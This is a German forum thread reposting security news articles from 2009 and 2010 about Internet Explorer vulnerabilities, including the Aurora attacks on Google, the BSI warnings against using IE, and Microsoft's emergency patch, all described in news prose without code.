Das Ganze war eigentlich als Schutzfunktion gedacht: Beim Öffnen einer Datei verlässt sich der Internet Explorer nicht blind auf möglicherweise falsche Anzeichen wie Dateinamen oder den MIME-Typ, den der Server übermittelt. Gibt es Grund zum Zweifel, etwa weil widersprüchliche Angaben vorliegen, schaut er in die Datei hinein und entscheidet an Hand des Inhalts, wie sie zu behandeln ist. Dieses sogenannte MIME-Sniffing kann dann sogar dazu führen, dass er in einer Bilddatei HTML-Code entdeckt, diesen rendert und eingebettetes JavaScript ausführt. Dieser Script-Code läuft dann im Kontext der Website und kann beispielsweise die Zugangsdaten des Anwenders ausspionieren.
Deshalb sollten die Betreiber von Webseiten, bei denen Anwender Bilder hochladen können, Typ und Inhalt der Bilder prüfen, bevor sie diese online stellen. Alternativ können sie die Bilder auch konvertieren, um eventuell eingebetetten Code zu entfernen. Den genauen Hintergrund und Demonstrationen des Problems präsentiert ein Hintergrund-Artikel auf heise Security.
Quelle : www.heise.de
Titel: Neuer Exploit nutzt Lücke im Internet Explorer
Beitrag von: Warpi am 18 Februar, 2009, 11:01
Für die vergangene Woche im Internet Explorer geschlossene Lücke (MS09-002) ist ein Exploit aufgetaucht, der einen Windows-PC mit Schadcode infiziert. Laut Bericht nutzen Cyberkriminelle den Exploit jedoch noch nicht direkt für Drive-By-Downloads, bei denen der Rechner bereits beim Besuch einer manipulierten Webseite gekapert wird, sondern haben ihn in Word-Dokumente eingebettet. Diese kommen offenbar per Mail auf den Rechner.
Laut Trend Micro ist im Dokument ein ActiveX-Control eingebettet, das bei Aufruf der Datei eine Webseite kontaktiert, die die Lücke auf ungepatchten Systemen ausnutzt, um weiteren Code nachzuladen und eine Backdoor zu installieren. Darüber hinaus installiert das Schadprogramm ein Programm, das Informationen auf einem System ausspähen kann.
Mehrere Hersteller von Antivirenprogrammen erkennen nach eigenen Angaben sowohl die manipulierten DOC-Dateien als auch die Backdoor. Bislang sieht es so aus, als handele es sich um wenige gezielte Angriffe, bei denen die Kriminellen den Exploit benutzen. Dies kann sich aber innerhalb kurzer Zeit ändern, sodass auch zahlreiche manipulierte Webseiten den Exploit für Drive-By-Downloads nutzen. Anwender sollten also nicht zögern, das von Microsoft angebotene Update zu installieren.
Insbesondere größere Unternehmen haben jedoch mit dem schnellen Einspielen von Sicherheits-Updates Probleme. Nach Angaben des Sicherheitsdienstleisters Qualys bietet gerade der Internet Explorer eine große Angriffsfläche für Kriminelle, um in Unternehmensnetze einzudringen. Dennoch hätten die Unternehmen die Verteilung von IE-Patches von den restlichen Sicherheits-Updates nicht getrennt, womit das Stopfen von Löchern mehrere Wochen dauere. Laut Wolfgang Kandek, Cheftechniker bei Qualsys, wäre auch beim Internet Explorer ein direktes Update innerhalb des Programm sinnvoll, wie es etwa auch der Mozilla-Browser Firefox bietet. Damit ließen sich vom Betriebssystem unabhängige Updates schneller installieren.
Quelle : heise.de (http://www.heise.de)
Titel: DOM-Schwachstelle lässt Internet Explorer abstürzen
Beitrag von: SiLæncer am 16 Juli, 2009, 17:02
Eine von dem Luxemburger Sicherheitsspezialisten G-SEC veröffentlichte Sicherheitslücke soll in mehreren Browsern zum Absturz führen oder so viel Arbeitsspeicher verbrauchen, dass der Rechner praktisch unbenutzbar wird. Der Trick ist einfach: Per JavaScript-DOM erzeugt eine Webseite ein Auswahlmenü (<select>) und weist ihm ein length-Attribut mit sehr hohem Wert zu. Dieses Attribut gibt die Anzahl der Menüeinträge an und sollte sich eigentlich qua Spezifikation und Menschenverstand nur lesen und nicht schreiben lassen.
(http://www.heise.de/bilder/142112/0/1)
Als einziger aktueller Browser lässt sich Internet Explorer 8 vom Proof of Concept aufs Kreuz legen.
Ein Proof of Concept zeigt, dass nicht mehr alle Browser von Problemen betroffen sind. Bei einem Test auf einem Vista-System war einzig Internet Explorer 8 hinreichend beeindruckt und stürzte ab. Opera schlug sich den Wanst mit RAM voll, blieb aber handlungsfähig; in der kommenden Version soll das Problem laut G-SEC repariert sein. Firefox, Safari und Chrome zuckten dagegen in den aktuellen Versionen nicht mit der Wimper. Nach Angaben von G-SEC sollen auch Firefox bis 2.0.19 und 3.0.5 sowie ältere Versionen von Chrome und Safari den gesamten verfügbaren Speicher aufbrauchen und danach abstürzen. Auf einem System mit Konqueror und Ubuntu soll der Bug wegen des voreingestellten Speichermanagements sogar zum Neustart des Rechners führen.
Quelle : www.heise.de (http://www.heise.de)
Titel: DOM-Schwachstelle lässt Internet Explorer abstürzen (Update)
Beitrag von: SiLæncer am 16 Juli, 2009, 18:32
Opera habe nach Auskunft von Thierry Zoller von G-SEC zwar zugesagt, den Bug mit Version 9.64 zu beheben, hat dies aber offenbar nicht getan; Microsoft wolle das Problem in Internet Explorer 9 beheben, der vermutlich ohnehin eine neue JavaScript-Engine bekommen dürfte. Betroffen sind auch die Browser der meisten Mobilgeräte (iPhone, Android und Symbian-Handys) und Spielekonsolen (Wii und PS3), wobei aktuelle WebKit-Browser in iPhone und Android-Geräten korrigiert sind.
Wie Thierry Zoller erklärt, handle es sich bei dem Problem um eine uralte Lücke, die sich bereits im neun Jahre alten Netscape 6 finde. Offenbar haben sich die anderen Browser-Hersteller an dessen Implementierung orientiert, sodass sämtliche gängigen Browser-Engines den gleichen Fehler aufwiesen, bevor die Hersteller durch G-SEC darauf aufmerksam gemacht wurden.
Quelle : www.heise.de (http://www.heise.de)
Titel: Neue kritische Lücke im Internet Explorer aufgetaucht
Beitrag von: SiLæncer am 22 November, 2009, 15:28
Auf der Sicherheits-Mailingliste Bugtraq tauchte am vergangenen Freitag ein Posting (http://www.securityfocus.com/archive/1/507984/30/0/threaded) mit dem Betreff "IE7" auf, das lediglich ein paar Zeilen kommentarlosen HTML-Code enthielt. Mittlerweile haben mehrere Sicherheits-Dienstleister bestätigt, dass der Code eine bislang unbekannte Sicherheitslücke in Internet Explorer aufzeigt.
Derzeit stürzt der Internet Explorer beim Aufruf des Exploit-Codes noch meistens ab.
In ersten Tests von heise Security stürzte der Internet Explorer beim Aufruf der HTML-Seite ab. Die Sicherheitsfirma Symantec bestätigt, dass der vorliegende Zeroday-Exploit noch unzuverlässig ist, erwartet aber in naher Zukunft das Auftauchen von stabilerem Code, der dann eine reale Gefahr darstellt. Das französische VUPEN konnte das Sicherheitsproblem mit Internet Explorer 6 und 7 auf Windows XP SP3 nachvollziehen und warnt, dass Angreifer damit eigenen Code einschleusen und so ein System mit Schadcode infizieren könnten. Eine Stellungnahme von Microsoft zu dem Problem liegt bislang nicht vor.
Wer sich hinter dem angeblichen Absender "securitylab.ir" verbirgt, ist derzeit unbekannt. Das Pseudonym taucht jedoch etwa seit April 2009 in Advisories und Exploits aus ganz verschiedenen Bereichen auf. Der Fehler tritt offenbar beim Aufruf der JavaScript-Methode getElementsByTagName auf. Somit können sich Nutzer des Internet Explorer schützen, indem man in dessen Einstellungen Active Scripting für die Internet-Zone deaktiviert. Damit werden allerdings viele Web-Seiten nicht mehr funktionieren. Da der Fehler in der Microsoft-Bibliothek mshtml.dll verortet wird, ist nicht anzunehmen, dass auch andere Browser betroffen sind.
Quelle : www.heise.de
Titel: Microsoft bestätigt kritische Lücke im Internet Explorer
Beitrag von: SiLæncer am 24 November, 2009, 10:07
Microsoft hat die am Wochenende gemeldete kritische Sicherheitslücke bestätigt und weitere Informationen zu betroffenen Systemen veröffentlicht. Demnach sind der Internet Explorer 6 SP1 unter Windows 2000 Service Pack 4 sowie Internet Explorer 6 und 7 unter Windows XP, Windows Server 2003, Windows Vista und Windows Server 2008 verwundbar. Der Fehler steckt jedoch nicht im Internet Explorer 5.01 SP4 und Internet Explorer 8.
Ursache des Problems ist ein falsch referenzierter Zeiger im Microsoft HTML Viewer (mshtml.dll) bei der Verarbeitung bestimmter CSS/STYLE-Objekte über die JavaScript-Methode getElementsByTagName(). Zeigt der Zeiger auf ein bereits gelöschtes Objekt, lässt sich dadurch der Browser zum Absturz bringen oder eingeschleuster Code starten. Der bereits kursierende Exploit arbeitet noch nicht stabil und führt oftmals nur zum Crash des Browsers. Bislang gibt es aber offenbar keine bekannten Webseiten, die die Lücke aktiv ausnutzen, um die PCs von Besuchern mit Schadcode zu infizieren. Dies kann sich jedoch schnell ändern.
Microsoft arbeitet an einem Sicherheits-Update und empfiehlt bis dahin, die Sicherheitseinstellungen für den Internet Explorer in der Internet- und lokalen Intranet-Zone auf "hoch" zu stellen. Alternativ schlagen die Redmonder vor, Active Scripting komplett zu deaktivieren. Damit werden allerdings viele Web-Seiten nicht mehr funktionieren. Laut Bericht soll die Datenausführungsverhinderung (DEP) Angriffe ins Leere laufen lassen. Der standardmäßig konfigurierte geschützte Modus des Internet Explorer 7 unter Vista soll zumindest die Auswirkung eines Angriffs eindämmen können.
Laut Bericht sind grundsätzlich auch Microsoft Outlook, Microsoft Outlook Express und Windows Mail betroffen, allerdings öffnen diese Anwendungen HTML-Mails standardmäßig mit den Rechten einer eingeschränkten Site, die Active Scripting verhindern.
Eine Schwachstelle im Microsoft Internet Explorer sorgt momentan dafür, dass Millionen von online gespeicherten PDF-Dokumenten sensible Informationen preisgeben.
Die Dokumente im Adobe-PDF-Format lassen erkennen, wo genau die Datei auf der Festplatte gespeichert ist. Dies gibt oft den Login-Namen des Erstellers preis, der möglicherweise Rückschlüsse auf den realen Namen zuläßt. Zudem können Rückschlüsse auf das verwendete Betriebssystem gezogen werden, da sich die Laufwerks- und Verzeichnis-Namen zwischen Windows und unixoiden Betriebssystemen wie Linux und Mac OS deutlich unterscheiden. Teilweise läßt der Pfad auch Rückschlüsse auf laufende Projekte oder auf installierte Software zu.
Gefunden werden können die Dateien durch schlichte Suchmaschinen-Anfragen mit einigen speziellen Parametern, wie dieses Beispiel mit mehreren Tausend Treffern zeigt. Insgesamt sollen auf diese Art rund 50 Millionen PDF-Dokumente gefunden werden können, schätzt ein Sicherheitsexperte, der nur unter dem Pseudonym "Inferno" seine Meinung zu dieser Problematik abgeben will. Er sieht in der Schwachstelle eine durchaus ernstzunehmende Bedrohung der Privatsphäre der Betroffenen. In seinem Blog verfasste er eine recht umfangreiche Beschreibung des Bugs.
Auf diese Art auffindbar sind PDF-Dateien, die mit Hilfe des "PDF-Druckers" des Microsoft Internet Explorer erstellt wurden. Der Internet Explorer bietet, wie auch die meisten anderen Browser, im normalen Druckermenü die Funktion, Websites mit Hilfe eines beliebigen PDF-Generators in PDF-Dateien umzuwanden. Verwendet man diese Funktion für lokal gespeicherte Websites, wird bei dem PDF der genaue Speicherort der betreffenden Website in den Footer geschrieben. Dies ist mit normalen PDF-Readern nicht immer erkennbar, zeigt sich aber, sobald man die Datei in einem Texteditor öffnet und wird auch von Suchmaschinen indexiert. Einzige bekannte Gegenmaßnahme ist momentan das manuelle Entfernen der Pfad-Angabe mit Hilfe eines PDF-Editors.
Von dem Problem sind alle Versionen des Microsoft Internet Explorer betroffen. Microsoft bemüht sich nach eigenen Angaben um eine Korrektur des Verhaltens. Zugleich betonte eine Sprecherin jedoch, es handle sich "nicht um eine Schwachstelle".
Quelle: www.gulli.com
Titel: Sicherheitsfunktion des Internet Explorer 8 unsicher
Beitrag von: SiLæncer am 25 November, 2009, 12:14
Der im Internet Explorer 8 eingeführte Cross-Site-Scripting-Schutz soll Berichten zufolge Schwachstellen enthalten, die eigentlich nicht verwundbare Webseiten doch verwundbar machen. Angreifer könnten auf diese Weise etwa eigenen JavaScript-Code in eine HTML-Seite einschleusen und im Kontext der normalerweise sicheren Seite ausführen. Damit ließen sich etwa Cookies auslesen oder vom Opfer ungewollt Kommentare in Foren posten – Beispiele für XSS-Würmer gab es in der Vergangenheit genug. Microsoft soll bereits seit mehreren Monaten über das Problem informiert sein, bislang aber nicht reagiert haben.
Über die Ursache des Problems gibt es keine genauen Angaben. Laut Giorgio Maone, Entwickler des Firefox-Plug-ins NoScript, soll es sich um einen fundamentalen Designfehler handeln. Maone hat zusammen mit anderen Entwicklern verschiedene XSS-Schutzfunktionen in Browsern analysiert und ist dabei nach eigenen Angaben auf das Problem gestoßen. Gegenüber heise Security erklärte er jedoch, seine Informationen erst bei Verfügbarkeit einer Lösung veröffentlichen zu wollen. Es sei aber mit Kenntnis der Funktionsweise des XSS-Filters des IE8 nicht schwer, das Problem zu rekonstruieren.
Anders als NoScript filtert der XSS-Schutz des Internet Explorer 8 nicht die Requests des Client nach verdächtigem Code, sondern die Antwort des Servers – und verändert sie unter Umständen. Dies lässt sich von Angreifer offenbar ausnutzen, um die Antwort des Servers zu manipulieren und eigenen Code einzuschleusen. Allerdings muss man nach Angaben von Maone eine gewisse Kontrolle über den Inhalt der Seite haben, die das Opfer aufgerufen hat. Dies ist etwa auf Social-Networking-Seiten, in Foren, Wikis und prinzipiell auch bei Google Apps der Fall. Google schaltet aber den XSS-Schutz des Internet Explorer durch Senden des Header X-XSS-Protection: 0 ab und ist somit nicht betroffen. Berichten zufolge hat Google diese Maßnahme aus Sicherheitsgründen ergriffen, da man von der IE-Schwachstelle bereits wisse und Anwender schützen wolle, bis Microsoft einen Patch herausgegeben habe.
Quelle : www.heise.de
Titel: Angriffe auf Google und Co. durch bislang unbekannte Lücke im Internet Explorer
Beitrag von: SiLæncer am 15 Januar, 2010, 09:44
Ersten Analysen des Antivirenherstellers McAfee zufolge nutzten die vermutlich chinesischen Angreifer bei ihrem Einbruch eine bislang unbekannte Sicherheitslücke im Internet Explorer aus. Die Lücke findet sich in den Versionen 6, 7 und 8 und lässt sich missbrauchen, um über eine manipulierte Webseite Code in einen Windows-Rechner zu schleusen und zu starten. Die Angreifer nutzten dies, um einen Trojaner-Downloader in den angegriffenen Rechner zu schleusen. Der lud wiederum über eine SSL-gesicherte Verbindung weitere Module von einem Server nach, unter anderem eine Backdoor, mit der die Angreifer aus der Ferne Zugriff auf den Rechner hatten. Die Links zu den präparierten Webseiten wurden wohl an ausgesuchte Mitarbeiter in den jeweiligen Firmen per Mail gesendet.
Aufgrund der bei der Analyse der Malware gesammelten Daten glaubt McAfee, dass der konzertierte Angriff gegen Google, Adobe und Dutzende weiteren US-Firmen, darunter wahrscheinlich auch Yahoo, Symantec, Juniper Networks, Northrop Grumman und Dow Chemical, unter dem Codenamen "Aurora" ablief. Zumindest sollen Pfadnamen in den Binaries Rückschlüsse darauf zulassen. Zunächst war spekuliert worden, dass für die gezielten Angriffe präparierte PDF-Dokumente verwendet wurden – in den letzten zwei Jahren ein beliebtes Mittel der Angreifer, deren Spuren regelmäßig nach China führen. Zuletzt wurde ein derart großer Feldzug (Ghostnet) bei Angriffen auf ausländische Regierungen im März 2009 bekannt.
Überraschend kommen die neuen Angriffe nicht, eher überrascht es, wieviele Firmen nun Opfer geworden sind. Immerhin warnte die US-Regierung noch im September 2009, dass China seine Cyber-Spionage stärker ankurbele und dabei immer sorgfältiger und erfolgreicher vorgehe. Die nun bekannt gewordenen Angriffe sollen von Mitte Dezember bis Anfang Januar stattgefunden haben. Möglicherweise spielte den Crackern dabei in die Hände, dass in diesem Zeitraum viele Angestellte Urlaub hatten.
Microsoft hat die IE-Lücke offiziell bestätigt und arbeitet bereits an einem Patch, den der Hersteller eventuell auch als "Emergency Patch" außerhalb der Reihe veröffentlicht. Laut Fehlerbericht ist die Lücke zwar in den Versionen 6, 7 und 8 zu finden, die Angriffe zielten aber bislang offenbar nur auf die Version 6 ab – eine interessante Aussage, die die Frage nach dem aktuellen Softwarestand in den betroffenen Unternehmen aufwirft.
Bis zu eine Update empfiehlt Microsoft, die Sicherheitseinstellungen für das Internet und das lokale Intranet auf "hoch" zu setzen. Da der gefundene Exploit JavaScript verwendet, hilft es zunächst auch, JavaScript zu deaktivieren. Zudem empfehlen die Redmonder, die Datenausführungsverhinderung (DEP) zu aktivieren. In den Versionen 7 und 8 ab Vista und später soll sich laut Bericht die Lücke nicht so einfach ausnutzen lassen, da der Internet Explorer dort im geschützten Modus läuft. Alles in allem sind also offenbar XP-Anwender mit Internet Explorer 6 am meisten gefährdet. Derzeit gibt es aber keinen öffentlich verfügbaren Exploit.
Quelle : www.heise.de
Titel: BSI warnt vor Nutzung des Internet Explorer
Beitrag von: SiLæncer am 15 Januar, 2010, 19:27
Als Reaktion auf eine Sicherheitslücke in mehreren Versionen des Internet Explorer (IE) hat das Bundesamt für Sicherheit in der Informationstechnik (BSI) am Freitag empfohlen, den Microsoft-Browser vorerst nicht zu nutzen, sondern bis zum Vorliegen eines Patches auf einen alternativen Browser umzusteigen. Das Ausführen des Internet Explorer im "geschützten Modus" sowie das Abschalten von Active Scripting erschwere zwar mögliche Angriffe, könne sie jedoch nicht vollständig verhindern, erläutert das BSI.
Zuvor war bekannt geworden, dass durch die Lücke in den IE-Versionen 6, 7 und 8 ein konzertierter Angriff gegen Google, Adobe und zahlreiche andere US-Firmen, hinter denen chinesische Cyber-Spione vermutet werden, ermöglicht wurde. Die Lücke, die Microsoft inzwischen offiziell bestätigt hat, ermöglicht es, über eine manipulierte Webseite Code auf einen Windows-Rechner zu schleusen und zu starten. Die Angreifer nutzten dies, um einen Trojaner-Downloader auf die angegriffenen Rechner zu schleusen.
Der Downloader lud wiederum über eine SSL-gesicherte Verbindung weitere Module von einem Server nach, unter anderem eine Backdoor, mit der die Angreifer aus der Ferne Zugriff auf die Rechner hatten. Die Links zu den präparierten Webseiten wurden wohl per Mail an ausgesuchte Mitarbeiter in den jeweiligen Firmen gesendet. Microsoft arbeitet eigenen Angaben zufolge an einem Patch und will diesen eventuell als "Emergency Patch" außerhalb der monatlichen Patchday-Reihe veröffentlichen.
Quelle : www.heise.de
Titel: Exploit für IE-Sicherheitslücke jetzt öffentlich
Beitrag von: SiLæncer am 16 Januar, 2010, 13:17
Für das Sicherheitsloch im Internet Explorer, mit dem offenbar der konzertierte Angriff mit dem Codenamen "Aurora" auf Google und Dutzende weitere amerikanische Firmen ablief, ist in mehreren Mailinglisten Exploit-Code aufgetaucht. Das Metasploit-Team hat den Exploit bereits reproduziert ein entsprechendes Modul in sein Exploit-Framework eingebaut. Mitarbeiter des Antivirenherstellers McAfee haben im Firmenblog bestätigt, dass es sich bei dem bekannt gewordenen Exploit um den handele, den sie als Ursache für die groß angelegte Attacke ausgemacht haben.
Da der Code nun für Jedermann verfügbar ist, können jetzt auch Script-Kiddies versuchen, ihn gegen beliebige Opfer einzusetzen. Daher gelten jetzt noch mehr als bisher die Empfehlungen des BSI, einen anderen Browser als den Internet Explorer einzusetzen. Wer den Microsoft-Browser weiterhin nutzen möchte oder muss, dem rät Microsoft, die Sicherheitseinstellungen für das Internet und das lokale Intranet auf "hoch" zu setzen. Da der gefundene Exploit JavaScript verwendet, hilft es zunächst auch, JavaScript zu deaktivieren. Zudem empfehlen die Redmonder, die Datenausführungsverhinderung (DEP) zu aktivieren. Nach aktuellem Erkenntnisstand lässt sich der Exploit in Internet Explorer 8 mit aktiviertem DEP nicht ausnutzen.
Quelle : www.heise.de
Titel: BSI-Warnung treibt Downloadzahlen bei Opera hoch
Beitrag von: SiLæncer am 19 Januar, 2010, 13:16
Nachdem das Bundesamt für Sicherheit in der Informationstechnik (BSI) am Wochenende vor der weiteren Verwendung von Microsofts Internet Explorer gewarnt hatte, schnellten bei Opera die Downloadzahlen hoch. Der norwegische Browser wurde nach Firmenangaben deutlich häufiger heruntergeladen.
Opera teilte Golem.de auf Nachfrage mit, dass sich die Downloadzahlen aus Deutschland bei Opera am vergangenen Wochenende mehr als verdoppelt haben. Opera sieht darin eine direkte Reaktion auf die BSI-Warnung vor dem Internet Explorer. Im Internet Explorer wurde ein Sicherheitsloch gefunden, das bereits für Angriffe auf verschiedene Firmennetzwerke missbraucht wurde. Mittlerweile kursiert Exploit-Code für Microsofts Browser im Internet.
Nach Angaben von Opera haben sich die Downloads am vergangenen Wochenende mehr als verdoppelt, so dass der Hersteller eine deutlich stärkere Nachfrage ausmachte. Statt 18.000 Downloads wurden 37.000 Downloads von Opera aus Deutschland gezählt.
Quelle : www.golem.de
Titel: Lücke im Internet Explorer: Gute und schlechte Nachrichten
Beitrag von: SiLæncer am 19 Januar, 2010, 16:40
US-Medienberichten zufolge will Microsoft noch in dieser Woche einen Emergency Patch veröffentlichen, der die für Angriffe auf Unternehmen wie Google ausgenutzte Lücke im Internet Explorer schließen soll. Derzeit führen die Redmonder noch eine Qualitätssicherung des Patches durch.
Bleibt zu hoffen, dass die Redmonder die Ankündigung wahr machen, denn die Einschläge kommen näher. Mehrere Berichte von Sicherheitsspezialisten widersprechen nämlich Microsofts IE-Verwundbarkeitsmatrix, wonach eigentlich nur Anwender des Internet Explorer 6 unter Windows 2000 und XP besonders gefährdet seien. Microsoft empfiehlt aktuell, auf den Internet Explorer 8 zu wechseln, da dieser zwar die Lücke aufweise, diese dort aufgrund der aktivierten Datenausführungsverhinderung (DEP) nicht ausnutzbar sei.
Dies triftt zwar für den zuerst veröffentlichten Exploit zu. Der Browserspezialist Dino Dai Zovi hat jedoch nach eigenen Angaben einen Exploit entwickelt, der auch mit dem Internet Explorer 7 unter Vista funktioniert. Der Sicherheitsdienstleister Vupen berichtet zudem, er haben einen Exploit für den Internet Explorer 8 entwickelt, der auch mit aktiviertem DEP laufe. Einzige Abhilfe brächte nur, JavaScript abzuschalten. Vupen stellt den Exploit jedoch nur Kunden zum Test zur Verfügung. Damit wird die gestern von Microsoft zur Verfügung gestellte "Fix-it"-Lösung obsolet, da diese nur DEP abschaltet.
Bislang gibt es zwar keine Berichte, dass Kriminelle die Lücke etwa zum Verteilen von Trojanern per Drive-by-Download missbrauchen. Dennoch empfiehlt es sich, bis zur Veröffentlichtung des Updates einen alternativen Browser einzusetzen, beispielsweise Firefox oder Opera.
Quelle : www.heise.de
Titel: IE-Schwachstelle wird aktiv ausgenutzt
Beitrag von: SiLæncer am 19 Januar, 2010, 23:23
Die kritische Schwachstelle des Microsoft Internet Explorer, die auch beim Google-Hack verwendet wurde, wird mittlerweile von Cyberkriminellen aktiv genutzt. Sogenannte "Drive-by-Downloads" infizieren nichtsahnende Benutzer.
Die Firma Websense gab am gestrigen Montag eine Warnung heraus, in der sie von "begrenzter öffentlicher Nutzung" der Schwachstelle berichtete. Die Schwachstelle wurde für sogenannte Drive-by-Downloads benutzt: Websites wurden entsprechend präpariert und kompromittierten die Rechner derjenigen, die mit dem Internet Explorer diese Seite aufriefen. Der Schadcode soll dabei mit demjenigen identisch sein, der von Sicherheitsexperten kürzlich veröffentlicht wurde (gulli:News berichtete). Websense arbeitet zusammen mit Microsoft daran, betroffene Websites zu identifizieren und vom Netz zu nehmen.
Ein Patch für die Schwachstelle steht noch nicht zur Verfügung. Einige Regierungen, darunter die deutsche und die französische, riefen daher bereits zur Nutzung alternativer Browser wie Firefox, Chrome, Safari oder Opera bis zur Behebung der Schwachstelle auf.
Währenddessen arbeitet Microsoft offenbar schon mit Hochdruck an einem Patch. Vermutungen, dass noch vor dem nächsten Patchday Anfang Februar ein Sicherheitsupdate für den Internet Explorer herausgegeben werden soll, scheinen sich zu bestätigen. Microsoft machte zwar noch keine eindeutige Ankündigung, begann aber weitläufig entsprechende Andeutungen und Hinweise zu streuen.
Mit dem Patch sei dann zu rechnen, wenn es auf allen Windows-Versionen getestet worden sei, heißt es. Einige Beobachter halten eine Veröffentlichung bereits am kommenden Wochenende für möglich.
Quelle: www.gulli.com
Titel: BSI warnt auch vor Outlook
Beitrag von: SiLæncer am 20 Januar, 2010, 09:11
Das Bundesamt für Sicherheit in der Informationstechnik (BSI) hat seine Warnung im Zusammenhang mit der aktuellen Sicherheitslücke im Internet Explorer erweitert. Auch bei der Verwendung von Outlook, Outlook Express, Windows Mail, Windows Live Mail, dem Hilfesystem und der Sidebar sei Vorsicht geboten.
Das BSI rät nicht nur, den Internet Explorer durch einen alternativen Browser zu ersetzen, bis Microsoft das offene Sicherheitsloch geschlossen hat. Auch bei der Verwendung anderer Microsoft-Produkte sei besondere Vorsicht geboten, denn von der Schwachstelle im Internet Explorer sind weitere Anwendungen betroffen. Die Schwachstelle beruht auf einem Fehler in der Microsoft-HTML-Bibliothek mshtml.dll und betrifft potenziell alle Anwendungen, die darauf zugreifen.
Nutzer von Outlook (bis einschließlich Outlook 2003), Outlook Express, Windows Mail und Windows Live Mail sollten laut BSI die "Eingeschränkte Zone" und nicht die "Internet-Zone" zur Anzeige von E-Mails verwenden, da dann die Ausführung von Active Scripting in der Standardeinstellung unterbunden sei. Zusätzlich sollte die Anzeige von HTML-E-Mails deaktiviert werden.
Unternehmen, in denen Outlook bis zur Version 2003 im Einsatz ist, sollten diese Einstellungen über Gruppenrichtlinien zentral vornehmen.
Darüber hinaus warnt das BSI vor dem Öffnen von Hilfedateien, insbesondere mit der Dateiendung ".chm", aus unsicheren Quellen. Auf die Nutzung der Sidebar sollte ebenfalls verzichtet werden, auch wenn Angriffe darüber eher schwierig durchführbar seien.
Die Lücke im Internet Explorer wird derzeit aktiv ausgenutzt und wurde auch für Angriffe auf Google und andere Unternehmen verwendet. Ein Patch ist in Arbeit und wird voraussichtlich außer der Reihe veröffentlicht.
Quelle : www.golem.de
Titel: Lücke im Internet Explorer: Rettung naht
Beitrag von: SiLæncer am 20 Januar, 2010, 16:13
Microsoft hat jetzt offizell bestätigt, dass es für den Internet Explorer außer der Reihe einen Patch geben wird. Genauere Angaben zu einem Zeitplan will man bis spätestens 9 Uhr am morgigen Donnerstagvormittag (mitteleuropäischer Zeit) veröffentlichen. Microsoft empfiehlt Anwendern bis dahin weiterhin, auf den Internet Explorer 8 zu wechseln, da dieser über erweiterte Sicherheitsfunktionen wie Datenausführungsverhinderung (Data Execution Prevention, DEP) und den geschützten Modus (Protected Mode) verfüge. Diese würden die derzeit bekannten Angriffe unwirksam machen.
In der Tat scheitert der zuerst aufgetauchte und bei den Aurora-Angriffen benutzte Exploit an DEP. Allerdings haben Sicherheitsspezialisten diesen bereits so weit verfeinert, dass er auch unter dem Internet Explorer 7 unter Vista und sogar dem Internet Explorer 8 mit eingeschaltetem DEP funktionieren soll. Diese kursieren glücklicherweise aber bislang noch nicht in größerer Runde. Da die Lücke in der Verarbeitung eines bestimmten JavaScript-Objekts zu finden ist, hilft zuverlässig nur das Deaktivieren von JavaScript.
Derweil hat das Bundesamt für Sicherheit in der Informationstechnik (BSI) seine Warnung vor dem Internet Explorer erweitert. Neben dem Browser sollen auch andere Microsoft-Produkte betroffen sein, die den MS HTML Viewer benutzen. dazu gehören nach Angaben des BSI Microsoft Outlook (bis einschließlich Outlook 2003), Outlook Express, Windows Mail, Windows Live Mail, das Microsoft Hilfesystem sowie die Microsoft Sidebar. Das BSI gibt diesmal jedoch keine Empfehlung für alternative Produkte.
Bei den Mail-Clients ist JavaScript standardmäßig deaktiviert, daher sind diese im Normalfall auch nicht über prärierte HTML-Mails angreifbar. Das Hilfesystem zur Verarbeitung von chm-Dateien ist indes nur angreifbar, wenn sich das Opfer eine präparierte Datei herunterlädt und öffnet. Die Sidebar ruft Informationen von Webseiten per http ab. Um Opfer dort eines Angriffs zu werden, müsste ein bereits installierte Mini-Anwendung jedoch auf eine präparierte Webseite zugreifen – ein nicht undenkbares, derzeit jedoch eher unrealistisches Szenario. Wer sich unsicher ist, schaltet die Sidebar einfach ab.
Quelle : www.heise.de
Titel: Patch für IE-Lücke soll noch heute erscheinen
Beitrag von: SiLæncer am 21 Januar, 2010, 10:10
Am heutigen Donnerstag Abend soll das Sicherheits-Update laut Ankündigung von Microsoft für den Internet Explorer erscheinen. Derweil gibt es erste Berichte, dass öffentlich zugängliche Webserver die Lücke nun aktiv ausnutzen, um Besucher mit Schädlingen zu infizieren. Bislang gab es nur Berichte über gezielte Angriffe auf Anwender in Unternehmen wie Google, Adobe und andere. Der bislang öffentlich verfügbare Exploit funktioniert aber nur in der Kombination Internet Explorer 6 und Windows XP.
Micrososofts unterstreicht zudem im Blog des "Security Research & Defense"-Teams, dass der Wechsel auf den Internet Explorer 8 derzeit ausreichend Schutz bieten würde. Die gemeldeten Exploits für den Internet Explorer 8, die in der Lage seien, die Datenausführungsverhinderung zu umgehen, würden nur einem eingeschränkten Kreis von Sicherheitsdienstleistern und CERTs zur Verfügung stehen. Ohnehin führe der Exploit in drei von vier Fällen nur zum Absturz des Browsers, was die Redmonder der Speicherverwürfelung (Address Space Layout Randomization, ASLR) zu Gute schreiben.
Unterdessen deuten Analysen des bei den Aurora-Angriffen auf Google und Co. benutzen Schadcodes laut SecureWorks darauf hin, dass die Entwicklungen dafür schon seit längerem im Gange sind. Bestimmte Compiler-Zeitstempel des untersuchten Codes sollen auf das Jahr 2006 datieren. Nach Meinung von Joe Stewart haben sich die Entwickler auch besondere Mühe gegeben, die Herkunft der Binaries und auf welchem System sie erstellt wurden, zu verschleiern. So ließen die jedem Programm verangestellten PE-Header keine Rückschlüsse zu, dass chinesische Entwickler an der Arbeit beteiligt waren. Normalerweise enthält der PE-Header den Länder- respektive Language-Code. Entweder hätten die Autoren den Code auf einem System mit englischsprachigen Einstellungen übersetzt oder die Header später manuell geändert.
Einzig ein von der Backdoor (Hydraq) benutzter CRC-Code soll auf eine chinesische Herkunft verweisen, da eine Google-Suche dazu ausschließlich auf chinesische Seiten führe. Bei derlei Sorgfalt der Angreifer stellt sich allerdings die Frage, warum es dann nicht gelang, die Kommunikation der Backdoor mit den Kontrollservern besser zu verschleiern. Die ist zwar per SSL verschlüsselt, die Spuren sollen dennoch nach China zurück zu verfolgen gewesen sein.
